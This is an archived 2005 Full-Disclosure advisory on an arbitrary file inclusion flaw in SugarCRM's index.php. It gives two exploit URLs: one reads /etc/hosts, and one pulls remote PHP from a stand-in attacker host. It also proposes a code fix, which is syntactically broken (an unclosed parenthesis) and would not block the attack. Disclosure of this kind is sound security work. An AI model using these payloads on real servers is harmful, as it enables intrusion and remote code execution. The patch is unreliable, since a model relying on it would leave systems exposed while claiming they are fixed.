[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[Full-Disclosure] Arbitrary file inclusion in SugarCRM [PHP]
- To: full-disclosure@xxxxxxxxxxxxxxxx
- Subject: [Full-Disclosure] Arbitrary file inclusion in SugarCRM [PHP]
- From: Santiago Cortes <blindot@xxxxxxxxx>
- Date: Thu, 6 Jan 2005 16:46:41 -0500
------------------------------------------------------------
Arbitrary File Inclusion in SugarCRM
------------------------------------------------------------
Author: Santiago Cortés
Date: Jan 06, 2005
------------------------------------------------------------
Vulnerability:
Failure to sanitize user input in index.php opens the possibility for
an attacker to include an arbitrary file when PHP's "register_globals"
is on.
Example:
http://www.sugarsales.com/index.php?module=Home&moduleDefaultFile[Home]=/etc/hosts
http://www.sugarsales.com/index.php?module=Home&moduleDefaultFile[Home]=http://www.attackersite.com/malicious.php
Fix:
Disable register_globals in your php.ini file, or
Replace line 198 in index.php:
$currentModuleFile = $moduleDefaultFile[$currentModule];
With
if ( !isset($moduleDefaultFile[$currentModule] ) {
die('No action specified');
}
$currentModuleFile = $moduleDefaultFile[$currentModule];
Disclaimer:
The information in this advisory and any of its demonstrations is
provided "as is" without any warranty of any kind.
I am not liable for any direct or indirect damages caused as a result
of using the information or demonstrations provided in any part of
this advisory.
Contact:
Santiago Cortés
blindot --at-- gmail
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html